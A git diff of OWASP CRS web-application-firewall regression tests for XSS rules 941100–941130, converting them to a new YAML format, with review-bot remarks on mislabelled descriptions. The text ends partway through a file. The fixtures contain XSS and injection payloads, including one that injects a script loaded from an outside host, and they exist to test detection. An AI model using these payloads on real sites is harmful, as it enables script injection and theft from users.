@@ -1,107 +1,104 @@ --- meta: author: "csanders-git, Walter Hop, azurit" - enabled: true - name: "941100.yaml" - description: "Tests to trigger, or not trigger 941100" +rule_id: 941100 tests: - - test_title: 941100-1 + - test_id: 1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941100" - - test_title: 941100-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941100] + - test_id: 2 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: 
id "941100" - - test_title: 941100-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941100] + - test_id: 3 desc: XSS testing of libinjection in User-Agent stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E' - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941100" - - test_title: 941100-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E' + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941100] + - test_id: 4 desc: XSS testing of libinjection in User-Agent stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Referer: http://www.coreruleset.org - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941100" - - test_title: 941100-5 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Referer: 
http://www.coreruleset.org + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941100] + - test_id: 5 desc: XSS testing of libinjection in User-Agent stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Referer: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941100" - - test_title: 941100-6 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Referer: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941100] + - test_id: 6 desc: Status Page Test - simplified XSS testing of libinjection in ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: - foo= - version: "HTTP/1.1" - output: - log_contains: id "941100" + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: 
localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: foo= + version: "HTTP/1.1" + output: + log: + expect_ids: [941100] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml index fb0718523..d80795be4 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml 
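Review bot: The `desc` on tests 4 and 5, `XSS testing of libinjection in User-Agent`, is carried over from test 3 but no longer describes those cases: both keep the benign default User-Agent, vary only the `Referer` header (a plain URL in test 4, an XSS payload in test 5), and assert `no_expect_ids: [941100]`, so they are negative tests on a different header. Something like `desc: Negative test - plain URL in Referer must not trigger 941100` for test 4 and `desc: Negative test - XSS payload in Referer must not trigger 941100` for test 5 would state what each assertion pins.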
@@ -1,54 +1,52 @@ --- meta: author: "4v3r9, Walter Hop, azurit" - enabled: true - name: "941101.yaml" - description: "Test to trigger 941101" +rule_id: 941101 tests: - - test_title: 941101-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Referer: www.github.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: xyz= + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 2 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?x=alert(1);" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?x=alert(1);" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 3 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "<script+>alert(1);</script>=value" - Host: localhost - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "<script+>alert(1);</script>=value" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 4 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Referer: "" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-5 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Referer: "" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 5 desc: XSS in URI / PATH_INFO going undetected - GH issue 1022 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/foo/bar%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E/" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-6 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/foo/bar%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E/" + headers: + Host: localhost + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 6 desc: XSS in payload using %uNNNN stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - data: | - var=%uff1cscript%u0020%uff1ealert%281%29%uff1c/script%uff1e - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + data: | + var=%uff1cscript%u0020%uff1ealert%281%29%uff1c/script%uff1e + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 7 desc: XSS in payload with individual code points urlencoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - data: | - var=%ef%bc%9cscript%20%ef%bc%9ealert%281%29%ef%bc%9c/script%ef%bc%9e - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-8 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + Content-Type: 
application/x-www-form-urlencoded + data: | + var=%ef%bc%9cscript%20%ef%bc%9ealert%281%29%ef%bc%9c/script%ef%bc%9e + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 8 desc: XSS in cookie name using unicode stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - Cookie: <script >alert(1)</script>=value - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-9 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + Cookie: <script >alert(1)</script>=value + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 9 desc: XSS in Referer using html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Referer: "<script+>alert(1);</script>" - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941110" - - test_title: 941110-10 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Referer: "<script+>alert(1);</script>" + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log: + expect_ids: [941110] + - test_id: 10 desc: GH issue 1481 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?%9cscript+%bcalert(1);%bc/script%9e=value" - headers: - User-Agent: "OWASP CRS test 
agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941110" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?%9cscript+%bcalert(1);%bc/script%9e=value" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941110] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml index 3a705d494..46415eef9 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml 
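Review bot: Every test in this file now asserts `expect_ids: [941110]` while the new top-level key says `rule_id: 941101`, so the file's identity and what it verifies disagree; the old titles were already `941110-2`…`941110-10`, so the commit carries the mismatch forward rather than creating it, but the migration to a single `rule_id` is the moment to resolve it. Either the Referer-based cases (test 4 with `Referer: ""`, test 9 "XSS in Referer using html entities") should expect 941101 if that is the Referer-scoped rule, or the file and `rule_id` should be renamed to 941110 — I cannot tell which from the diff alone. Test 1 also lost its `Referer` line and now sends only `Cookie: xyz=` with no `desc`; if the payload was stripped by rendering ignore this, otherwise the test has nothing that should fire 941110. Separately, tests 6 and 7 use `data: |`, which keeps a trailing newline in the POST body; `data: |-` sends the payload without a trailing `\n`.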
@@ -1,104 +1,102 @@ --- meta: author: "Christian S.J. Peron, Walter Hop, azurit" - description: None - enabled: true - name: 941120.yaml +rule_id: 941120 tests: - - test_title: 941120-1 + - test_id: 1 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onload%3d%20=vardata" - version: HTTP/1.0 - output: - log_contains: id "941120" - - test_title: 941120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onload%3d%20=vardata" + version: HTTP/1.0 + output: + log: + expect_ids: [941120] + - test_id: 2 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onabcdefgh%3d%20=vardata" - version: HTTP/1.0 - output: - log_contains: id "941120" - - test_title: 941120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onabcdefgh%3d%20=vardata" + version: HTTP/1.0 + output: + log: + expect_ids: [941120] + - test_id: 3 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onab%3d%20=vardata" - version: HTTP/1.0 - output: - no_log_contains: id "941120" - - test_title: 941120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onab%3d%20=vardata" + version: HTTP/1.0 + output: + log: + no_expect_ids: [941120] + - test_id: 4 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?%20%20onabcdefghijklmnopqrstuvwxyz%3d%20=vardata" - version: HTTP/1.0 - output: - no_log_contains: id "941120" - - test_title: 941120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?%20%20onabcdefghijklmnopqrstuvwxyz%3d%20=vardata" + version: HTTP/1.0 + output: + log: + no_expect_ids: [941120] + - test_id: 5 desc: "XSS Filter - Category 2: Event Handler Vector" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: 'FCNEC=[["AKsRol96Mxyk9FqhFojBc6fQqh-bo-s0VYkniISe0wOz3NRAr90HMsu ZQ81FJitWrfPRF09u-aYlhT0PMzLHW-cwgE2c_bmkaerz5Ht3N2y-Tseg5C_ngXVXK2eHiHVfBdx8iAtcRpqNdws_RZwZarM8E0ONvOztHg=="]]' - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - 
no_log_contains: id "941120" - - test_title: 941120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: 'FCNEC=[["AKsRol96Mxyk9FqhFojBc6fQqh-bo-s0VYkniISe0wOz3NRAr90HMsu ZQ81FJitWrfPRF09u-aYlhT0PMzLHW-cwgE2c_bmkaerz5Ht3N2y-Tseg5C_ngXVXK2eHiHVfBdx8iAtcRpqNdws_RZwZarM8E0ONvOztHg=="]]' + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941120] + - test_id: 6 desc: "SVG onload injection in filename" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php/%3Csvg/onload=alert()" - version: HTTP/1.0 - output: - log_contains: id "941120" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php/%3Csvg/onload=alert()" + version: HTTP/1.0 + output: + log: + expect_ids: [941120] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml index 4a8eb1bf2..c6190136a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml 
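Review bot: Tests 1–5 all carry the identical `desc: "XSS Filter - Category 2: Event Handler Vector"`, so a reader cannot see that tests 3 and 4 are negative length-boundary cases (`onab` and `onabcdefghijklmnopqrstuvwxyz` with `no_expect_ids`) and test 5 is a cookie false-positive regression; the new format keeps `desc`, so this is the place to say it, e.g. `desc: "Event handler name too short - must not match"` for test 3 and `desc: "FP: Google FCNEC cookie must not match"` for test 5. Tests 1–4 are also `POST` requests with no `data` and no `Content-Type`, the vector riding only in the query string, while test 5 is `GET` — a `GET` would state the intent more plainly unless the `POST` is deliberate. Minor: `version: HTTP/1.0` is plain in tests 1–4 and 6 but quoted `"HTTP/1.1"` in test 5; pick one quoting style for the file.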
@@ -1,327 +1,325 @@ --- meta: author: "csanders-git, Christian Folini, azurit" - description: "Tests to trigger, or not trigger 941130" - enabled: true - name: 941130.yaml +rule_id: 941130 tests: - - test_title: 941130-1 + - test_id: 1 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941130" - - test_title: 941130-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E" + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941130] + - test_id: 2 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('%lbsod;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 
"var=555-555-0199@example.com'||(select extractvalue(xmltype('%lbsod;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 3 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=aai" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-4 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=aai" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 4 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=abcd'||(select extractvalue(xmltype('%cgger;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-5 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=abcd'||(select extractvalue(xmltype('%cgger;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 5 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: 
"/post" - data: "var=" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-6 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 6 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('%grorj;" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "var=/active/LFI/LFI-Detection-Evaluation-POST-200Valid/content.ini'||(select extractvalue(xmltype('%grorj;" + version: HTTP/1.0 + output: + log: + expect_ids: [941130] + - test_id: 7 desc: "XSS test for 941130" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "var=afa" - version: HTTP/1.0 - output: - log_contains: id "941130" - - test_title: 941130-8 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
